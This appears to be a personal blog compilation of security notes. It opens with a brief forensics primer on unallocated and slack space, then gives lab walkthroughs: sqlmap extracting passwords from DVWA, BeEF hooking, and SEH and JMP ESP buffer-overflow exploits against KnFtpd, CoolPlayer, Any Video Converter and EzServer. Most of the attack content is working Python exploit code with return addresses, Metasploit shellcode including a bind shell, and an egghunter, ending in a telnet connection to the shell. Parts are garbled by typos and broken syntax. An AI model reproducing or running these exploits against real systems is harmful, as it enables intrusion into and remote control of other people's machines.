Introduction Forensic Bacis

Computer Forensic 

Computer forensics (sometimes known as computer forensic science) is a branch of digital forensic science pertaining to legal evidence found in computers and digital storage media. The goal of computer forensics is to examine digital media in a forensically sound manner with the aim of identifying, preserving, recovering, analyzing and presenting facts and opinions about the information.

 Unllocated space

Unallocated space, sometimes called “free space”, is logical space on a hard drive that the operating system, e.g Windows, can write to. To put it another way it is the opposite of “allocated” space, which is where the operating system has already written files to.
Unallocated file space and file slack are both important sources of leads for the computer forensics investigator. The data storage area in a factory fresh hard disk drive typically contains patterns of sectors which are filled with patterns of format characters. In DOS and Windows-based computer systems, the format pattern for a floppy diskette usually consists of binary data in the form of hex F6s. The same format pattern is sometimes used in the format of hard disk drives but the format patterns can consist of essentially any repeat character as determined by the factory test machine that made the last writes to the hard disk drive. The format pattern is overwritten as files and subdirectories are written in the data area.

Slack Space
Slack space refers to portions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.

Illustration of slack space on a hard drive

DVWA Exploit (Medium)

1. open your DVWA , and login
   username  = admin
   password  = password

2.setting DVWA security become Medium

and then choose Sql Injection and the click submit

check cookie in burpsuite

4. open terminal, and change direktori to "sqlmap "

5. running sqlmap, with cookie sand result last submit

 "./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "Cookie: securityid=%27&Submit=Submit#" --cookie "Cookie: security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5"

and this result

6. search password
 "./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "Cookie: securityid=%27&Submit=Submit#" --cookie "Cookie: security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5" --Users --password

and this result

sorry not to root, I am still trying to get root

combination windows with metasploit exploit and beef

1. switch on "beef"

 

2. open link on URL http://127.0.0.1:3000/ui/panel, and this result
3.  login before entor to home panel beef with username and password same "beef"

 

and this result after login

4. make file "victim.html", for place "beef"

5. look the result, it will display "alert dialog" according to the insert in the panel already home "beef".

 do execute for beef panel with alert dialog

6.open a msfconsole

How to Use POP POP RETN

RETN POP POP used to bypass Sehhandler in an application ..as a regular apliasi its protection by Safeseh, Safeseh which serves to protect Sehhandler, therefore we need a module ..Her usual default module is not protected safeseh

KnFtpd 1.0.0 exploit

1. make fuzzer

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

open knftpd and ollydbg, do fuzzing, and this result

after fuzzing see EIP and SEH chain

 this result after press SHIFT + F9 in seh chain

2. create pattern offset and results

edit file fuzzer become
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
#buffer = "\x41" * 3000
buffer = "Aa0Aa1Aa2Aa3Aa4A........." #result generate offset

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

3. search value POP r32, POP r32 and RETn, and this result

edit your file fuzzer become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
buffer ="\x41"* 322
buffer+="\x23\x37\x40\x00"
buffer+="\x41"* (3000 - len(buffer))

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()




   and do fuzzer, this result

4. check with deadbeef
again edit your file fuzzer, become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000
buffer ="\x41"* 322
#buffer+="\xef\xbe\xad\xde"
buffer+="\x23\x37\x40\x00"
buffer+="\x41"* (3000 - len(buffer))

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()





and this result

after thet, checking jmp ESP , i am use kernel32.dll, check this result

CoolPalyer In Exploit (local)

1. make file fuzzer, as shown below:
myfile="cool.m3u"
myjunk="\x41" * 500
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()

 and tehn , running Coolplayer and olldbg, load file "cool.m3u" and the Crash.. look register IP in ollydbg overwrite

 
Cek In SEH Chain, and this result and the press Shift + F9

2. you make pattern offset, and copy result pattern offset on this file fuzzer
become :
myfile="cool.m3u"
myjunk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7
Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8A
d9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7
Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8
Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak
3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am
5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A
o6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()

do running coolplayer and olldbg, load do fuzzing, and this result value EIP

3. do DEADBEEF for check, before check deadbeef , make a pattern offset

edit our file fuzzer, become

myfile="cool.m3u"
myjunk="\x90" * 260
myjunk+="\xEF\xBE\xAD\xDE"
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()
and this result

4. Finding JMP ESP
choose Execute Modules , in here i use shell32.dll -double click in shell32.dll.. and the right click- search for -comand, type JSM ESP..

and this result

and press shift+ F9 for checking stack , and this result

5. Edit your file fuzzer, to get the calculator to prove that the correct offset pattern.. open browser and click 127.0.0.1:55555, choose payload-windows execute command, as a below

#!/usr/bin/python
myfile="cool.m3u"
myjunk="\x90" * 260
myjunk+="\xD7\x30\x9D\x7C"
myjunk+="\x90" * 16
myjunk+=("\xdb\xdc\xb8\x76\x35\x3c\x23\x2b\xc9\xb1\x23\xd9\x74\x24\xf4\x5f"
"\x83\xef\xfc\x31\x47\x13\x03\x31\x26\xde\xd6\x41\xa0\x5a\x19\xb9"
"\x31\xe8\x5c\x85\xba\x92\x5b\x8d\xbd\x85\xef\x22\xa6\xd2\xaf\x9c"
"\xd7\x0f\x06\x57\xe3\x44\x98\x89\x3d\x9b\x02\xf9\xba\xdb\x41\x06"
"\x02\x11\xa4\x09\x46\x4d\x43\x32\x12\xb6\xa8\x31\x7f\x3d\xef\x9d"
"\x7e\xa9\x76\x56\x8c\x66\xfc\x37\x91\x79\xe9\x4c\xb5\xf2\xec\xb9"
"\x4f\x58\xcb\x39\x93\x50\xd3\x25\x98\xd3\xe3\x20\x5e\xab\x0f\xa1"
"\x1f\x40\x9b\xc5\x83\xf5\x10\x4d\xb4\xee\x2e\x06\x44\x40\x30\x18"
"\x45\x2a\x59\x24\x1a\x1d\x6c\x34\xf2\xd4\x68\x37\x3a\x9d\xd8\x5f"
"\x4b\xe8\xdd\xc0\xc3\x75\x23\x74\x1d\xd1\x23\x6f\x41\xbc\xb7\x0c"
"\x86")
file=open(myfile,'w')
file.write(myjunk)
print"Yess.."
file.close()
 
running coolplayer and the load file fuzzer before his, and then this result

 

Exploit Any Video Conveter (Local)

1.      you make file fuzzer , with file name “fuzzerany.py”

            #!/usr/bin/python

namafile="profiles_v2.xml"

junk = “\x41” x 700

buff="<root>\n"

buff=buff + "<categories>\n"

buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

buff=buff + "</categories>\n"

buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")

file.write(buff)

print("berhasil yes...")

file.close()

2.      copy file result fuzzing to folder in anyvideoConveter, running ony video and then running ollydbg, observe the results, will have register EIP as shown below

 

            view SHE chain and do press Shift + F9 , and this result

 

 

3.      make create pattern, and create pattern offset

4.      search value POP r32, POP r32 and RETN, and this result

5.      copy file DVCAPTUREddl from windows to linux, and the destination paste in folder root/tmp, and do "./msfpescan"

6.      edit your “fuzzerany.py” become

#!/usr/bin/python

namafile="profiles_v2.xml"

junk = “\x90” x 328

buffer+="\xcc\xcc\xcc\xcc"

buffer+="\x41\x41\x41\x41"

buff="<root>\n"

buff=buff + "<categories>\n"

buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

buff=buff + "</categories>\n"

buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")

file.write(buff)

print("berhasil yes...")

file.close()

7.      and the last (again) added result generate payload..

active “msfweb” →   open browser type “127.0.0.1:55555”  → choose payload → micrsoft bind shell.sis as shown below

 

after it emerged the results generated payload Become edit result :

 

#!/usr/bin/python

namafile="profiles_v2.xml"

junk="\x90"* 328

junk+="\xeb\x06\x90\x90"

junk+="\x33\xE6\x01\x10"

junk+="\x90" * 16

shellcode=("\xba\x60\xf6\x4d\x9a\xda\xcc\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x51"

"\x83\xc0\x04\x31\x50\x0e\x03\x30\xf8\xaf\x6f\x4c\x6e\xdb\xdd\x44"

"\x96\xe4\x21\x6b\x09\x90\xb2\xb7\xee\x2d\x0f\x8b\x65\x4d\x95\x8b"

"\x78\x41\x1e\x24\x63\x16\x7e\x9a\x92\xc3\xc8\x51\xa0\x98\xca\x8b"

"\xf8\x5e\x55\xff\x7f\x9e\x12\xf8\xbe\xd5\xd6\x07\x83\x01\x1c\x3c"

"\x57\xf2\xf5\x37\xb2\x71\x5a\x93\x3d\x6d\x03\x50\x31\x3a\x47\x39"

"\x56\xbd\xbc\xc6\x4a\x36\xcb\xa4\xb6\x54\xad\xf7\x86\xbf\x49\x7c"

"\xab\x0f\x19\xc2\x20\xfb\x6d\xde\x95\x70\xcd\xd6\xbb\xee\x40\xa8"

"\x4d\x03\x0c\xcb\x84\xbd\xfe\x55\x41\x71\x33\xf1\xe6\x06\x01\x5e"

"\x5d\x16\xb5\x08\x96\x05\xca\xf3\x78\x29\xe5\x5c\xf0\x30\x6c\xe3"

"\xef\xb3\x73\xb6\x85\xc1\x8c\xe8\x32\x1f\x7b\xfd\x6e\xc8\x83\x2b"

"\x23\xa4\x28\x80\x97\x09\x9c\x65\x4b\x71\xf2\x0f\x03\x9c\xaf\xa9"

"\x80\x17\xae\xa0\x4f\x8c\x2b\xba\x48\x9b\xb4\xec\x3d\x34\x1a\x45"

"\x3d\xe4\xf4\xc1\x6c\x2b\xec\x5e\x90\xe2\xbd\x35\x91\xdb\x2a\x50"

"\x24\x5a\xe3\xcd\x48\xb4\xa4\xa5\xe2\x6c\xba\x95\x98\xe7\xa3\x6c"

"\x59\x8e\x7c\x71\xb3\x24\x7c\x5d\x5a\xad\xe6\x3b\xcb\x52\x8a\x4a"

"\xee\xff\x04\x15\xd8\x33\x2d\x42\x70\x88\xa7\x6e\xb4\xd0\x4b\xc4"

"\x49\x92\x86\xe6\xf4\x3f\x4a\x9b\x83\x07\xc7\x08\xd8\x10\x65\xb0"

"\xac\xf7\x76\x39\x97\x08\x5e\x9a\x40\xa5\x0e\x4d\x3e\x23\xb0\x3c"

"\x91\xe6\xe3\x41\xc1\x61\xa9\x64\xe7\xbf\xe2\x69\x3e\x55\xfa\x6a"

"\x88\x55\xd4\x1f\xa0\x55\x56\xdb\x2b\x59\x8f\xb1\x4c\x75\x58\x4b"

"\x6b\x94\xea\xe0\x74\x8f\xf2\xd6"

)

buff="<root>\n"

buff=buff + "<categories>\n"

buff=buff + "<category name=\""+junk+shellcode+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

buff=buff + "</categories>\n"

buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")

file.write(buff)

print("berhasil yes...")

file.close()

then, running AnyVideo Conveter and crashh

 do telnet or nc in terminal on backtrack for into System C windows
 

  

EzServer PART II

in the last posting, im not into system C, because there problem on the calculation stack. . ok we repetead disscuss

1. see, we not finish in statement "telnet", this is solution
edit our file fuzzing "fuzzereasy.py", become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()

and you do fuzzing "fuzzerserver.py"

2. calculation to determine its true or not, we use the "calc"
open browser and type "127.0.0.1:55555" choose payload-windows execute command, and fill it in dialog box..as picture below

and do click generate payload, and this result

and then -- edit ou file fuzzer , become..

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+=("\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5"
"\xde\x82\x48\x83\xeb\xfc\xe2\xf4\x49\x36\xc6\x48\xb5\xde\x09\x0d"
"\x89\x55\xfe\x4d\xcd\xdf\x6d\xc3\xfa\xc6\x09\x17\x95\xdf\x69\x01"
"\x3e\xea\x09\x49\x5b\xef\x42\xd1\x19\x5a\x42\x3c\xb2\x1f\x48\x45"
"\xb4\x1c\x69\xbc\x8e\x8a\xa6\x4c\xc0\x3b\x09\x17\x91\xdf\x69\x2e"
"\x3e\xd2\xc9\xc3\xea\xc2\x83\xa3\x3e\xc2\x09\x49\x5e\x57\xde\x6c"
"\xb1\x1d\xb3\x88\xd1\x55\xc2\x78\x30\x1e\xfa\x44\x3e\x9e\x8e\xc3"
"\xc5\xc2\x2f\xc3\xdd\xd6\x69\x41\x3e\x5e\x32\x48\xb5\xde\x09\x20"
"\x89\x81\xb3\xbe\xd5\x88\x0b\xb0\x36\x1e\xf9\x18\xdd\x2e\x08\x4c"
"\xea\xb6\x1a\xb6\x3f\xd0\xd5\xb7\x52\xbd\xe3\x24\xd6\xde\x82\x48")
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()











running Ezserver without you running ollydbg, and make fuzzing,

appear  running EZserver before fuzzing

and appear after fuzzing

if appear calculator then value offset is true

3. at the last, make egghunter, edit for file fuzzer ..
put payload from metasploit framework, and then your copy result payload in the file fuzzing become -->>

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
#buffer="\x90" * 5879
buffer="\x90" * 5457


hunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")


payload = ("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")



buffer+= "w00tw00t"
buffer+= payload
buffer+= "\x90" * 70
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x96\x96\x20\x10"
buffer+= "\x90" * 16
buffer+= hunt
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()





running Ezserver
and this resullt 





do fuzzing with terminal

 type "telnet "ip_target" "port_target" "

from above picture seen that we've managed to do explotation
Alhamdullilah